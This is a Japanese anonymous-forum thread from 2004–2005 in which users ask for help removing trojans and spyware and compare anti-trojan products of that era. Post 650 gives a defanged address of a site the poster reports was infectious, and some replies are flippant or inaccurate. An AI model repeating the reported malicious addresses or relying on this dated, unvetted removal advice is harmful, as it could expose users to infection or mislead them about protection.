539 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/21 03:27:12]
Kasperskyという、アンチウィルス/トロイを兼ねてしかも
どちらの検出率も飛び抜けている実績を持つ
優秀な常駐プログラムがあります。

540 名前:名無しさん@お腹いっぱい。 [04/11/21 09:40:49]
>>538
そのスレでも誰にも相手されてないじゃん

541 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/21 09:56:27]
とりあえずSSMで起動を阻止するのも手では?



542 名前:名無しさん@お腹いっぱい。 [04/11/21 11:55:08]
>>537
アンチウイルスがトロイに弱いというのはなぜ?
検出の仕組みが違うの?
つまりウイルスの検出力を上げるとどうしても
トロイの検出力が下がるってこと?

543 名前:名無しさん@お腹いっぱい。 [04/11/21 14:58:43]
トロイって何でこうも削除できないんだろう?
申し訳ないのですが、削除の仕方教えてください

【使用OS】WindowsMe

C:\windows\questmod.dll
C:\windows\vsapi32.dll
C:\windows\Schedlog
C:\windows\WIN386.SWP
上記4ファイルが「削除できません:アクセスできません。送り側のファイルが使用中の可能性があります」
と、なってしまい削除できません
どうしたらきれいに消せますか?

544 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/21 15:36:54]
自己責任で。
www.forest.impress.co.jp/article/2002/11/06/rebootfiledeleter.html

545 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/21 22:50:27]
最近ノートンを掲示板に投稿するため無効にしたままネットをしていると電源がブチっと切れました。急に切れることが何度も続くので数日ケーブルを外し放置したら直ったのでノートンでスキャンしたのですが何も感染は見つかりませんでした。
以前トロイの木馬が云々という警告がノートンから一度出たのでトロイとやらに感染したと思ってそうしました。

で特に今は何も問題ないんですがそれまではごくたまにだったトロイの警告がネットをしてるといつも出ます。いずれも韓国からです。

この状況はやばいのでしょうか・・・・どうか教えてください。

546 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/22 07:35:04]

【1-20を読んだか】
【使用OS】
【WindowsUpdateしてるか】
【AntiVirus/AntiTrojanは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス/トロイ名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

547 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/22 19:19:06]
Prevx has detected 143 potential intrusion attacks on this system.

だそうな 導入4日で143ね
FWにはZA使ってるがその間に
「37個の進入をブロックしました」 
・・・・・




548 名前:名無しさん@お腹いっぱい。 [04/11/23 03:15:01]
ウィルスバスターのオンラインスキャンで
TROJ_QHOST.Hというのが検出されたんですが
データベース等検索してもヒットしません。
TROJ_QHOST.Nというのはありましたが。。


549 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/23 13:54:48]
Registry Protのアンインストールってどうやるんでしょうか?
情けない質問で申しわけない_| ̄|○


550 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/23 14:19:54]
>>549
RPADMIN.EXE

551 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/23 14:43:16]
>>550
ありがとうございます( ´∀`)




552 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/23 20:40:53]
トロイ対策にソフトをインストしようと思うのですが、
このスレでよく名前の出ているewidoとa2はどちらを
導入した方がよいのでしょうか?

双方インストした方がセキュリティ面では安全なのでしょうか。
アドバイスお願いいたします。

553 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/23 23:21:23]
>>552
ewidoはちゃんとアンインスコできない
とか書いてるのを見かけたので
俺はa2しか入れてないな。

554 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/24 12:43:46]
>>553
間違いないよ、俺、今日アンインスコしたけれど
ゴミが残ってるよ。
ewidoで検索かけたら出てきたけど、それだけじゃないみたいだ。
最近では一番癖の悪いソフトだと思ったよ。
んで、現在は俺もa2のみ。

555 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/24 16:06:05]
>>552
両方いれればいいんじゃないかと

556 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/24 16:15:00]
じゃあ再インスコまでewidoは放っておくか・・・。

557 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/24 23:15:07]
OSのサービスに二種類登録されてるけれど
無効にして、ewidoをアインスコし、ewidoで検索掛けて
出てきた物を削除したが、サービスに登録が残ったままになっとるよ。
レジストリーもクリーナーでクリーニングしたんだけど駄目。
手動で探してゴミを削除するしかないみたいですね。

558 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/25 11:28:24]
>>557 DriverWalker ttp://www001.upp.so-net.ne.jp/yamashita/product/dw/
サービス削除楽だよ。

559 名前:557 mailto:sage [04/11/25 11:28:50]
DriveDiet XP Professionalのソフトでサービスを検索して
削除成功。
之で、サービスに登録されていたewidoの2種類を完全削除できました。
これで、もうゴミは無いと思います。
二度と入れんぞ糞そewido

560 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/25 11:33:04]
>>558
サンクスです。

561 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/26 00:40:15]
【1-20を読んだか】 sir,yes,sir!
【使用OS】 ウインドウズXPプロフェッソナル
【WindowsUpdateしてるか】 サービスパック2は未だ様子見
【AntiVirus/AntiTrojanは何を使っているか】 ノートンアンチウイルス、シマンテック
やウイルスバスターサイトでネットスキャンもよくやっている
【ちゃんとUpdateしてるか】 sir,yes,sir!
【スキャンした結果(ウイルス/トロイ名・発見場所)】 出てきません
【別のオンラインスキャンしたならその結果は】 出てきません
【症状を具体的に、分かる限りすべて書く】 17000portを1秒間に20回使用される
【何をしたらそんなことになったのか】 リアル友人にエロアニメもらった、あとアメリカの
ネトゲサイトを回ってみたり(notエロ)、
【これまでにとった措置】 全スキャン5回(ノートン)ネットスキャンというスキャンを試した
【その他の質問】
リバーストロージャンの疑いが高いです。検出してレジストリからも消してしまいたいです



562 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/26 01:21:29]
>リバーストロージャンの疑いが高いです
はぁ?知ってるならやれば?

563 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/26 02:34:43]
ここに一杯有るね。
ttp://f57.aaa.livedoor.jp/~kumakuma/tool/virus.html
Spy-Ad ExterminatorってAd-awareSEよりよさげな感じ。

564 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/26 10:57:08]
>>561
> 17000portを1秒間に20回使用される
外から?中から?

565 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/26 20:10:41]
>>561【1-20を読んだか】 sir,yes,sir!

嘘つくな
>>1セキュリティー関係で質問ある方は下記へどうぞ。
ここで質問しろなんて書いてないぞ。

566 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/26 22:07:08]
>>563
a2ないのね・・・・

567 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/27 14:24:18]
>>557
>サービスに二種類登録されてるけれど無効にして、ewidoをアインスコし

笑うとこですか?

568 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/27 22:40:45]
>>567
    (゚Д゚) (゚Д゚)
   (゚Д゚)  (゚Д゚)    (゚Д゚)(゚Д゚)(゚Д゚)   ???????
   (゚Д゚)   (゚Д゚)          (゚Д゚)  ??   ??
  (゚Д゚)     (゚Д゚)    (゚Д゚)(゚Д゚)       ??
  (゚Д゚)     (゚Д゚)    (゚Д゚)         ??
 (゚Д゚)       (゚Д゚)   (゚Д゚)         ??
 (゚Д゚)       (゚Д゚)   (゚Д゚)
(゚Д゚)         (゚Д゚) (゚Д゚)          ??

569 名前:名無しさん@お腹いっぱい。 mailto:sage [04/11/28 15:41:53]
>>567
意味不明な事を書いてんじゃねーよ、ボケ

570 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/01 10:37:17]
             ,イ    │
          //      |:!
            //,. -/r‐- 、| !
         /,/ ./ |  _」 ト、
       /.\`/  |二...-┘ ヽ
.        i   ,.>、;/ー- 、    l
       ! ∠.._;'____\   |
      ,!イ く二>,.、 <二>`\.、ヽ.
     /'´レ--‐'ノ. `ー---- 、 |\ ヽ、
    \  `l  (!"      Jfヽ!  `''-;ゝ
      `‐、jヽ ヾニニ>   ゙イ" }_,,. ‐''´
         `´\  ー   / ,ィ_}
.          |_ `ー ''´ _」'
        _,.| ~||「  ̄ 人|、._
  ,r==;"´  ヽ ミ|||彡   / ` ー`==、-、
. ///,イ  ___ ヽ|||_,,. ‐''´___  | | | |ヽ

571 名前:名無しさん@お腹いっぱい。 [04/12/01 19:05:49]
Swat It!でスキャンしたらLiveMakerというソフトのBmpToGale.exeで
Latinus v1.4.clというトロイが検出されました。
a2やad-aware、Spybotでは検出されませんでした。

どういうトロイなのか知っている人いないでしょうか。お願いします。



572 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/03 02:03:49]
トロイ対策はBitdefenderでいいですね?

573 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/03 04:37:16]
このスレを全部読めばそんな風には思わん。

574 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/04 10:44:50]
>>571
バックドア系のハックツール

575 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/04 20:46:39]
>>570
木馬繋がりか。

576 名前:名無しさん@お腹いっぱい。 mailto:age [04/12/06 21:18:19]
フリーはa2、ewodo、Swat Itだけでしょうか?

577 名前:571 mailto:sage [04/12/06 21:29:31]
>>574
ありがとうございます

578 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/07 15:18:11]
TROJ_AGENT.BR くらった・・・・( ̄へ ̄|||)
DHCP認識しなくなって XP SP2 導入後
WINカタログをリセットさせてようやく復旧
4時間もかかった・。・゚(´д⊂)゚・。・

しっかりしてくれよVB

579 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/07 17:27:42]
>>578
我々に関心があるのは、なにしていてTROJ_AGENT.BRをくらったか、なんだが。

580 名前:名無しさん@お腹いっぱい。 [04/12/07 19:46:10]
トロイが入っても
ノートン買えば大丈夫

581 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/07 20:09:20]
>>579
         マイヤヒー!マイヤフー!
     \\  マイヤホー!       //
 +   + \\ マイヤハッハー!!//+
                            +
.   +   /■\  /■\  /■\  +
      ( ´∀`∩(´∀`∩) ( ´ー`)
 +  (( (つ   ノ(つ  丿 (つ  つ ))  +
       ヽ  ( ノ ( ヽノ   ) ) )
       (_)し'  し(_)  (_)_)


マイヤヒ-ブームの火付け役になったフラッシュ
pinkmelon.net/maiyahi/maiyahi.htm

記憶が定かでないがたぶん↑ここのリンク先(踏まないようにネ・・ここは大丈夫なんだけど)

>>580
なんかここ半年ほどシマンテックのほうが対応いいよね
のりかえようかなぁ・・・・・・・



582 名前:名無しさん@お腹いっぱい。 [04/12/08 23:38:51]
zg009174.ppp.dion.ne.jp

583 名前:名無しさん@お腹いっぱい。 [04/12/09 11:39:46]
ん?

584 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/10 10:17:59]
↓初心者に分かりやすい駆除方法が載っています
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20030926221125958

585 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/10 11:08:29]
↑download trojan の場合

586 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/12 21:05:32]
結局、一番検出力が高くて軽いのはどれ?

587 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/12 22:09:50]
フリーはa2、ewodo、Swat Itだけでしょうか?(´・ω・`)

588 名前:名無しさん@お腹いっぱい。 [04/12/13 17:32:29]
 

589 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/15 17:19:00]
アンチキーロガーもこのスレでいいんでしょうかねぇ

590 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/15 20:25:03]
キーロガーもトロイの一種だからここでいいだろ

591 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/15 20:29:57]
>>587
つAranea Spywizard ttp://www.freeimagebrowser.com/
つSpy-Ad Exterminator ttp://www.oreware.com/



592 名前:名無しさん@お腹いっぱい。 [04/12/16 17:58:19]
エロサイト巡ってたらトロイもらった

593 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/17 00:36:14]
エロイトロイ

594 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/17 00:51:17]
インリン・オブ・ジョイ・トロイ

595 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/17 07:12:40]
>>587
Prevx Home ttp://www.prevx.com/prevxhome.asp

596 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/18 10:25:08]
>>インリン・オブ・ジョイ・トロイ
大変なことになりそうだな。

597 名前:名無しさん@お腹いっぱい。 [04/12/20 22:27:45]
なんでかgoogleのキャッシュに飛べない、繋がらない…という
変な症状がトロイで出ることありますか?

598 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/20 22:49:54]
>>597
なんか同じような文をどっかで見かけた
その現象流行ってるのか?

599 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/20 23:24:20]
大流行してますよ。

600 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/20 23:40:44]
>>598
「不正アクセスしてくるIPを…」
pc5.2ch.net/test/read.cgi/sec/1092025431/l50
ここの875で報告したんだが
「釣り」だと言われていまったよ('A`)

601 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/21 00:19:20]
875 名前:名無しさん@お腹いっぱい。[] 投稿日:04/12/19(日) 00:30:29
詳細: ルール「Ultor's トロイの木馬のデフォルト遮断」が www.google.co.jp(64.233.189.104)、1234 を遮断しました。
インバウンド TCP 接続
ローカルアドレス、サービスは (*************(192.168.1.2)、1234)
リモートアドレス、サービスは (www.google.co.jp(64.233.189.104)、http(80))

(・3・)アルェ〜? ←釣り扱いの原因はこれ



602 名前:名無しさん@お腹いっぱい。 [04/12/21 22:19:21]
すいません。これ踏んでしまったんですけどなんだか分かりません
鑑定していただけませんか?
ttp://cgi28.plala.or.jp/ll/lll/img20041218200143.zip

603 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/21 22:29:17]
↑Not Found

604 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/22 15:32:11]
TROJ SMALL GUってのくらったんですけど、バスターでもEWIDOでも駆除も、隔離もできません。復元オフにしてセーフで削除して再起動してもまた元に戻ってます。どうすればいいでしょうか?

605 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/27 00:27:09]
TROJ XTRAY Aってのがあるみたいなんですがどうすればいいんでしょう…

606 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/27 01:18:43]
>>605
マルチしやがったな。もう答えねえ。

607 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/28 02:52:05]
>>605
2階の窓から投げ捨てろ

608 名前:名無しさん@お腹いっぱい。 mailto:sage [04/12/31 09:35:11]
>>595
これ入れて2ヵ月
Prevx has detected 3816 potential intrusion attacks on this system
ハァ?
気にしな〜ぃ 気にしな〜ぃ 気にしな〜ぃんだよ〜♪


609 名前: 【大凶】 - 【1164円】 mailto:sage [05/01/01 11:45:30]
明けおめ

610 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/01 11:46:57]
ぐぇー と、言うことで
もう一度引き直し 明けおめ

611 名前: 【凶】 - 【1209円】 mailto:sage [05/01/01 11:47:57]
失敗 _| ̄|○

明けおめ



612 名前: 【凶】 - 【1817円】 mailto:sage [05/01/01 11:48:49]
あまりにも気分が悪いので また

明けおめ

613 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/01 11:51:59]
アンタ最悪だなw

614 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/01 16:59:09]
>>609-612
・・・山崎邦正ばりに笑いの神が降りて来てるな、生`w

615 名前: 【末吉】 【485円】 mailto:sage [05/01/01 21:19:06]
!omikuji!dama

616 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/01 22:16:12]
トロイ関係ではどのソフトが一番(・∀・)イイの?

617 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/02 00:15:40]
>>616
素直に言えば
一番がTiny、2番がSSM あとは気休め程度で大差ない。

618 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/02 00:20:11]
↑補足
当然アンチウイルスを入れた上でさらに補強すればの話。

619 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/03 20:01:33]
未知のトロイ、ワームやウイルスをブロックするには
確かに、Tinyの砂箱は強力だがVirtual PCなど使って怪しいアプリは仮想上で
実行してみるのも効果的だと思う。
されに、どうにもならないような問題が起きてしまった時はバックアップツール
を使ってシステムのイメージから書き戻せる体制があれば心強いよな。

620 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/04 08:14:21]
googleのキャッシュに飛ぼうとすると、トロイをブロックしますた、と
出た後でうんともすんとも…という状態になります。
ノートンアンチウィルスやネットセキュリティではなんも出来んということ??

621 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/04 12:40:06]
>>620
普通そんなことにはならない。というか、もしそのような障害が出れば
大騒ぎになるのでは?
少なくとも漏れは無問題だ。



622 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/04 18:49:35]
>621
うっ、ありがとうございます。
ひゃーどうしたらいいのー検索しようにも…!もうダメ?!と焦って、
勝手に絶望してますた。
ちょっと落ち着いて、初めから勉強してみます。

623 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/07 00:34:43]
Ewido Security Suite、Tauscan、a2を使ってみたがどれも決定打に欠けるような気がする。
一つ選ぶとしたらTauscanかなあ。皆さんはどうですか?

それともトロイ系はやはりノートンが鉄板なのかなあ・・・

624 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/07 00:50:26]
ProcessGuardが 3になってからかなり評判がいいらしい。

625 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/07 01:43:08]
アンチウイルス、アンチトロイ系で100%と言えるものはないが
初心者のうちは、新種のウイルスやトロイに対応が少しは早い
ノートンのアンチウイルスが無難だと言えるかな。
あとは、各自の環境やスキルに応じてセキュリティ環境の構築が
微妙に違ってくると言うのが流れだな。

626 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/07 16:44:51]
>>624
ProcessGuard入れてるんだったら感想を聞かせて欲しい。
漏れは2年ぐらい前に2回ほどProcessGuard試したんだが起動段階でハング
したので、その当時は日本語環境では使えないと思った。

627 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/07 20:05:25]
セキュリティの知識は全くと言っていいほど2chから入手したんで市販のソフトって使ったことないのよね。
ノートンとか使い勝手良いのかしら。

628 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/07 21:24:25]
雑音の釣り

629 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/12 23:20:27]
すいません、AVGが動かなくなった為avastをいれたのですが
C\RESTORE\TEMPの.CPYにてTrojan-genが検出されました。
変なEXE動いてるかみても怪しい物はなく、隠しファイルに入ってる
物なので消しちゃいけないかと思い、ご教授して頂きたい。

630 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/12 23:39:26]
お得意の誤検出じゃないの?
一応他のでも試してみては?BitDefenderとかAntidoteとか

631 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/12 23:58:04]
やっぱり誤検出でしょうか。
ありがとうございます、自信がなかったもので。
一応他で試して又報告させていただきます。



632 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/13 02:41:35]
Antidoteで今までやりました。
結果は綺麗なもんでした・・・・
ありがと。おやすみ('A`)ノシ


633 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/26 03:26:45 ]
さっきウイルスバスターを入れて初めて感染していたことに気付きました。
知らないうちに情報が漏れたりしてるんでしょうか・・・

634 名前:名無しさん@お腹いっぱい。 mailto:sage [05/01/27 17:35:31 ]
気付いたときには漏れ漏れだったなんて事はよくあること。
でもまぁなんだ、漏れてなかったと自己暗示すればいいのさ。

635 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/01 19:45:49 ]
eScanのスレってないんだね(´・ω・`)

636 名前:名無しさん@お腹いっぱい。 [05/02/04 01:53:11 ]
>>635
(^^)y━~~

637 名前:名無しさん@お腹いっぱい。 [05/02/12 21:15:40 ]
ほ「


638 名前:名無しさん@お腹いっぱい。 [05/02/13 16:50:47 ]
トロイってexeを実行しない限り感染しないんですか?

639 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/13 16:57:16 ]
>>638
いや、セキュリティホールが残っていたら、ウェブサイト経由でインストールされちまう
だから、ウィンドウズアップデートする

640 名前:名無しさん@お腹いっぱい。 [05/02/13 17:06:03 ]
>>639
なるほどありがとうございます。
ノートンでトロイが検出されてしまったので。
削除のみしたのですがなんか心配になって。
ウインドウズアップデートもしてみます。

641 名前:名無しさん@お腹いっぱい。 [05/02/13 18:33:28 ]
>>639
なるほどありがとうございます。
ノートンでトロイが検出されてしまったので。
削除のみしたのですがなんか心配になって。
ウインドウズアップデートもしてみます。



642 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/14 17:04:20 ]
とても納得したようだね

643 名前:名無しさん@お腹いっぱい。 [05/02/15 23:00:47 ]
>>638
あまい、もうちょっと勉強したほうがいいよダウンロードして勝手に実行するのもあるよ


644 名前:名無しさん@お腹いっぱい。 [05/02/15 23:02:51 ]
ホームページ閲覧 −>トロジャン感染ー>ダウンロードー>実行
これら自動的に行うのがダウンロード トロジャン


645 名前:名無しさん@お腹いっぱい。 [05/02/15 23:04:50 ]
ダウンロード トロジャン にやられると何もしてないのにIEは勝手に何かにアクセスして通常動作は著しく重くなる

646 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/15 23:16:11 ]
>>643-645今日どこかのスレでで見かけたアフォだ( ´,_ゝ`)プッ

647 名前:名無しさん@お腹いっぱい。 [05/02/16 04:39:46 ]
質問です。
jpgなどの画像ファイルにトロイがバインドされていた場合どうなるのですか?
画像を表示しただけで起動してしまうのでしょうか?
動画にバインドされていた場合もプレビューが表示された時点で起動してしまうのでしょうか?

648 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/16 05:15:18 ]
>>647
e-words.jp/n/JPEG.html
一般の人はWindowsのセキュリティパッチを欠かさず当てていれば過度に心配
する必要もないと思う。
トロイなどに利用される脆弱性は一般の人が気付かなくても研究者によって
絶えずチェックされて見つかれば警告→修正パッチリリースという流れだから
蔓延する前に穴を突かれてトロイにやられる人は余程ツキがないと思った
ほうがいいと思う。

649 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/16 05:23:02 ]
(追加)
それよりも、初心者が気をつけるべきなのは、HTMファイルを単にJPGなどの拡張子に
変えてWeb上に置いてあるものを画像だと思ってクリックしてアダルトサイトなどに繋げられて
スクリプト操作でスパイウェアやトロイを仕込まれることかと。
これはJavaScriptやActiveXをむやみに許可しないことで防げます。

650 名前:名無しさん@お腹いっぱい。 [05/02/16 07:31:19 ]
今、困っていることがあります。助けて下さい。
このサイトを踏んだら ttp://69.50.161.142/inc/nan7.html (←危険!!)
JAVA_BYTEVER.Aというスパイウェアに感染してしまいました。
当時Windows XPでSP2はインストールしていませんでした。
慌ててSP2をインストールし、 マイクロトレンドのウィルスバスター2005の無償版で
とりあえずJAVA_BYTEVER.Aは隔離できたようなんですが、 まだ解決していない問題がいくつかあります。
1.ホームページを「about:blank」にしているにもかかわらず、IEを開くと
ttp://www.geocities.jp/sutesaite/img/spyware.jpg
というサイトが開きます。 [uninstall homepage]をクリックしても
ttp://www.geocities.jp/sutesaite/img/stopzilla.JPG という広告サイトに移ります。
2.時折勝手に ttp://www.geocities.jp/sutesaite/img/site.JPG というアダルトサイトのポップアップが開きます。
3.時折勝手に ttp://www.geocities.jp/sutesaite/img/wsc.jpg というメッセージが開き、[YES]ボタンを押すと
ttp://www.geocities.jp/sutesaite/img/wsc2.jpg というサイトに移ります。
一見マイクロソフトのページのように見えますが実はそうではないようで、
[Download Recomemnded Software]をクリックすると
ttp://www.geocities.jp/sutesaite/img/stopzilla.JPG という広告サイトに移ります。
4.時折勝手に ttp://www.geocities.jp/sutesaite/img/risk.JPG というサイトが開きます。
バルーンをクリックすると ttp://www.geocities.jp/sutesaite/img/fightspyware.JPG
というのが表示され、[REMOVAL TOOLS]をクリックしても
ttp://www.geocities.jp/sutesaite/img/stopzilla.JPG という広告サイトに移ります。
使用OS:Windows XP Home Edition
使用ブラウザ:IE6.0.2900.2180.xpsp_sp2rtm.04083-2158
使用PC:DELL DEMENSION 8300
よろしくお願いします。


651 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/16 07:53:42 ]
>>650
ウィルス情報&質問 総合スレッド☆Part27
pc5.2ch.net/test/read.cgi/sec/1104587430/898

(・∀・)ニヤニヤ



652 名前:名無しさん@お腹いっぱい。 [05/02/18 09:11:56 ]
今度Tauscanを使ってみた

653 名前:名無しさん@お腹いっぱい。 [05/02/18 13:00:16 ]
どなたか、TROJ AGENT KX に感染した人いますか?
ぐぐってみても、KXは見つからないんです。
ファイルを削除しても削除してもリアルタイム検索に引っかかります…

654 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/18 13:14:50 ]
>>653
別名Troj/Codeine-A
www.sophos.com/virusinfo/analyses/trojcodeinea.html

検出ファイルに関連があるサービスがここに登録されていると思われる。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

655 名前:653 mailto:sage [05/02/18 13:23:55 ]
>>654
ありがとうございます!
ただ、そこのアンチウイルスのIDEが開けないんですが…

656 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/18 13:26:00 ]
>>655
はぁ?解説見て手動で退治するんだよ。

657 名前:名無しさん@お腹いっぱい。 [05/02/18 21:32:51 ]
only capable of finding a limited number of Trojans. In addition, most of them o
nly offer cursory support should the application malfunction
, for example by locking up every time you boot your computer. Neither do they o
ffer a user-friendly interface. Of course, any protection is
better than none at all, but do you really want to spend hours on end learning h
ow to use such a tool? And can you really be sure that your
system is properly protected afterwards?

In that respect, Tauscan offers you a user-friendly tool that runs without any u
ser intervention and can be installed without the need for a
ny computer literacy on the part of the user.
Installing Tauscan also ensures that your system remains fully protected against
new strains that appear almost daily by allowing you to
download the latest updates directly from our web site.

658 名前:名無しさん@お腹いっぱい。 [05/02/18 21:33:56 ]
Tauscan vs. Anti-Trojan Software

Computer enthusiasts developed most of the popular anti-Trojan type of programs
currently available that are in the same class and price range of Tauscan. Altho
ugh they do offer some protection against Trojan viruses, they lack the expertis
e that comes with a product developed by a company that specializes in anti-Troj
an technology. A great many of these utilities lack proper protection because th
ey are only capable of finding a limited number of Trojans. In addition, most of
them only offer cursory support should the application malfunction, for example
by locking up every time you boot your computer. Neither do they offer a user-f
riendly interface. Of course, any protection is better than none at all, but do
you really want to spend hours on end learning how to use such a tool? And can y
ou really be sure that your system is properly protected afterwards?


In that respect, Tauscan offers you a user-friendly tool that runs without any u
ser intervention and can be installed without the need for any computer literacy
on the part of the user.

Installing Tauscan also ensures that your system remains fully protected against
new strains that appear almost daily by allowing you to download the latest upd
ates directly from our web site.

659 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/18 21:38:24 ]
ハイフネーションもせずに、適当にぶった切りかよw
おまけに切る箇所も適当ってw

さしずめお前馬鹿だな >>657-658

660 名前:名無しさん@お腹いっぱい。 mailto:??? [05/02/18 22:07:31 ]
ウイルスの名前だけでも教えてください
【使用OS】Windows Xp Pro
【WindowsUpdateしてるか】最近してない
【使用AntiVirusソフト】AVG7.0 (確認できない状態なので細かくはわかりません)
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】 してません。
【症状、具体的に分かる限りすべて書く】画面に「♂♀」がでてあえぎ声がする
【何をしたらそんなことになったのか】友人から送られたzip解凍後「偽装解除.bat」を踏んでしまった
【これまでにとった措置】batファイルを踏む前にスキャンしたものの脅威なしと出たので実行。上記の症状となりCtrl+alt+Delもきかない状態に。
その後、セーフモードで起動し、本体と思れるものを c\windows\system32 から消したところ、♂♀とあえぎ声はでなくなりましたが、exe系が片っ端から実行できません。
なので、窓の社なども起動できません。 タスクトレイも時計しか表示されていません。
『regedit』も立ち上がらないのですが、再インストールしか方法はないのでしょうか?


661 名前:名無しさん@お腹いっぱい。 [05/02/18 22:11:45 ]
あのぅ〜トロイとウィルスとスパイウェアはどうちがうんですか?




662 名前:名無しさん@お腹いっぱい。 [05/02/18 23:56:15 ]
Trojan dropperというウイルスに感染したようなのですが、
駆除の方法が全くわかりません。自分の駆除ソフトでは対応していないので
自分で駆除する方法を調べていますがわかりません。
どなたかご親切な方がいたら教えてください。よろしくお願いします。

663 名前:名無しさん@お腹いっぱい。 [05/02/19 00:08:28 ]
cyan.moo.jp/yado/index.html

664 名前:名無しさん@お腹いっぱい。 [05/02/19 00:21:36 ]
>>650-651

ワロタ

665 名前:名無しさん@お腹いっぱい。 [05/02/19 11:48:52 ]
>>662
ノートンでスキャンすれば削除可能

666 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/20 15:10:41 ]
>>660
この前の俺と一緒だ。トレンドも検知できなかったよ。
俺はバックアップから戻してどうにかした。

テキストファイルを新規作成後、バッチファイルにリネームして
cmd(XPだったので)て入力して保存後、ダブルクリックして実行、
DOS窓が起動したら、EXEを直接実行すると起動できるものもあった。

次回のために直せたら教えてね。

667 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/23 14:50:53 ]
パソコンを再起動したら、真っ黒い画面に「〜のファイルが見つからないか壊れてます」みたいな感じのメッセージがでてた。
しかたなくリカバリーしたんだけど、サウンドデバイスがこわれるわ、メルブラのキャラの動きが遅いわでもうサイアク!

・・・ウイルスバスターで検索したら、「TORJ_SMALL.SN」ってでたんだけどもしかしてこれが原因?

668 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/23 17:08:35 ]
>>667
完全復活!以上!

669 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/24 04:14:17 ]
>>667-668
御洒落さんだね!

